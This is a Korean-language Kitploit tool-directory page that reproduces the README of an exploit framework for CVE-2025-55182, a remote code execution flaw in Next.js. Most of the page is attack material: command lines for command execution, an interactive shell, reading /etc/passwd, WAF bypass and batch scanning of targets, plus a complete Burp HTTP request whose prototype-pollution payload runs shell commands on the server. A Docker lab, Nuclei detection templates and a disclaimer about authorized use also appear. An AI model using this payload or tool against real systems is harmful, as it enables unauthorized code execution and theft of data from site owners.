Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
react2shell-exploit — React2Shell-Exploit — CVE-2025-55182를 위한 완전한 익스플로잇 프레임워크로, Python 익스플로잇, Docker 취약 실습 환경, Burp Suite 수동 및 자동 익스플로잇, Nuclei 탐지 템플릿, 검증된 테스트 워크플로우를 포함합니다. 침투 테스트 및 교육 연구용으로 개발되었습니다. | Kitploit
도구/GitHubGitHub/rubensuxo-eh/react2shell-exploit
Vulnerability ScannersExploit FrameworksWeb Application ExploitationWAF BypassPenetration TestingCommand and ControlLearning & EducationPayload DevelopmentLabs & Practice
GitHubrubensuxo-eh/react2shell-exploit

react2shell-exploit

React2Shell-Exploit — CVE-2025-55182를 위한 완전한 익스플로잇 프레임워크로, Python 익스플로잇, Docker 취약 실습 환경, Burp Suite 수동 및 자동 익스플로잇, Nuclei 탐지 템플릿, 검증된 테스트 워크플로우를 포함합니다. 침투 테스트 및 교육 연구용으로 개발되었습니다.

저장소 보기
4149개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

🐺 React2Shell-Exploit-Kensei

CVE-2025-55182 - Next.js RCE 원격 코드 실행

공격 프레임워크 + 취약한 실습 환경 + Burp Suite 및 Nuclei 검증.

보안 연구 및 침투 테스트를 위한 완전한 공격 프레임워크 및 취약한 실습 환경.

root@kitploit:~
╔═══════════════════════════════════════════════════════════════╗
║              🐺 React2Shell-Exploit-Kensei 🐺                 ║
║              CVE-2025-55182 Exploitation Tool                 ║
║                                                               ║
║  Author: Ruben Suxo - Ethical Hacker (kensei)    v2.5.0      ║
╚═══════════════════════════════════════════════════════════════╝

🎯 개요

React2Shell-Exploit-Kensei는 Next.js 애플리케이션의 심각한 원격 코드 실행 취약점인 CVE-2025-55182를 공격하기 위한 종합 툴킷입니다.

다음이 포함됩니다:

  • 🐍 Python 공격 도구 (자동 + 수동 모드)
  • 🐳 Docker 취약 실습 환경 (Next.js 16.0.6)
  • 🔥 Burp Suite 공격 템플릿
  • 🚨 Nuclei 탐지 템플릿
  • 🧪 검증된 테스트 케이스

영향받는 버전:

  • Next.js < 16.0.7
  • React 19.0.0

CVSS 점수: 10.0 (치명적)

✨ 기능

🔨 공격

✅ 자동 공격 ✅ 대화형 셸 ✅ 명령 실행 ✅ 파일 읽기 ✅ WAF 우회 ✅ 배치 스캔

🧪 실습 환경 Docker 설치 - 사전 요구사항

취약한 실습 환경을 실행하려면 Docker가 설치되어 있어야 합니다.

플랫폼설치 링크
Windowshttps://docs.docker.com/desktop/install/windows/
macOShttps://docs.docker.com/desktop/install/mac-install/
Linuxhttps://docs.docker.com/engine/install/

설치 확인:

root@kitploit:~
docker --version

📖 문서

✅ Burp Suite 가이드 ✅ Nuclei 템플릿 ✅ 전체 예제


🚀 빠른 시작

root@kitploit:~
# 1. Clone
git clone react2shell-exploit
cd react2shell-exploit
chmod +x react2shell-exploit.py

# 2. Start Lab
cd docker
docker build --no-cache -t react2shell-lab .
docker run -d -p 3002:3002 --name react2shell-lab react2shell-lab

# 3. Exploit
python3 react2shell-exploit.py --url http://localhost:3002 --cmd "whoami"

💻 사용 예제

스캔

root@kitploit:~
python3 react2shell-exploit.py --url http://target.com --scan

명령 실행

root@kitploit:~
python3 react2shell-exploit.py --url http://target.com --cmd "id"

대화형 셸

root@kitploit:~
python3 react2shell-exploit.py --url http://target.com --shell

파일 읽기

root@kitploit:~
python3 react2shell-exploit.py --url http://target.com --read /etc/passwd

WAF 우회

root@kitploit:~
python3 react2shell-exploit.py --url http://target.com --cmd "whoami" --waf-bypass

배치 스캔

root@kitploit:~
python3 react2shell-exploit.py --list targets.txt --scan --threads 20

🔍 수동 공격

Burp Suite

검증 완료 - 요청 템플릿:

root@kitploit:~
POST / HTTP/1.1
Host: target.com:3002
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad
Next-Action: x
Content-Length: 734

------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="0"

{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B1337\"}","_response":{"_prefix":"var res=process.mainModule.require('child_process').execSync('whoami',{timeout:30000}).toString().trim();throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/exploit?out=${encodeURIComponent(res)};307;`});","_chunks":"$Q2","_formData":{"get":"$1:constructor:constructor"}}}
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="1"

"$@0"
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="2"

[]
------WebKitFormBoundaryx8jO2oVc6SWP3Sad--

예상 응답:

root@kitploit:~
"children":["__PAGE__?{\"out\":\"root\"}",{}]

WHOAMI 수동 테스트: 내 스크린샷

IFCONFIG 수동 테스트: 내 스크린샷

대체 자동 감지 방법:

  • ✅ Extensibility Helper 확장 프로그램:
    1. 확장 프로그램으로 이동합니다:
    2. "Extensibility Helper"를 설치하고 이동합니다

내 스크린샷

  1. "Bambda Store"로 이동합니다
  2. "CVE-2025-55182,CVE-2025-66478 - React2Shell"을 찾습니다

내 스크린샷

  1. "import"를 클릭합니다

내 스크린샷

  1. "Audit Selected Items"를 실행합니다

내 스크린샷

내 스크린샷

내 스크린샷

  1. 사용자 지정 탭에서 "CVE-2025-55182,CVE-2025-66478 - React2Shell"이 선택되어 있는지 확인합니다 내 스크린샷
  • ✅ ActiveScan++: 자동 감지

내 스크린샷

Nuclei

검증 완료:

root@kitploit:~
nuclei -target http://target.com:3002 -t nuclei/CVE-2025-55182.yaml

출력:

root@kitploit:~
[CVE-2025-55182] [http] [critical] http://target.com:3002/

내 스크린샷

🐺 크레딧

작성자: Ruben Suxo - Ethical Hacker (kensei) 버전: 2.5.0 날짜: 2025-12-06

연구 및 영감

이 프로젝트는 다음의 연구와 기법을 기반으로 합니다:

  • assetnote/react2shell-scanner - 스캐너 구현
  • freeqaz/react2shell - 공격 기법
  • whiteov3rflow/CVE-2025-55182-poc - 개념 증명

취약점 발견

  • Lachlan Davidson (@lachlan2k) - CVE-2025-55182 최초 발견

⚠️ 법적 고지

공인된 보안 테스트에만 사용하세요.

무단 접근은 불법입니다. 소유한 시스템 또는 명시적 테스트 허가를 받은 시스템에서만 사용하세요.


📄 라이선스

MIT License


🐺 Hack The Planet - 책임감 있게

교육 목적으로만 사용하세요. 윤리적으로 사용하십시오.

도구 다운로드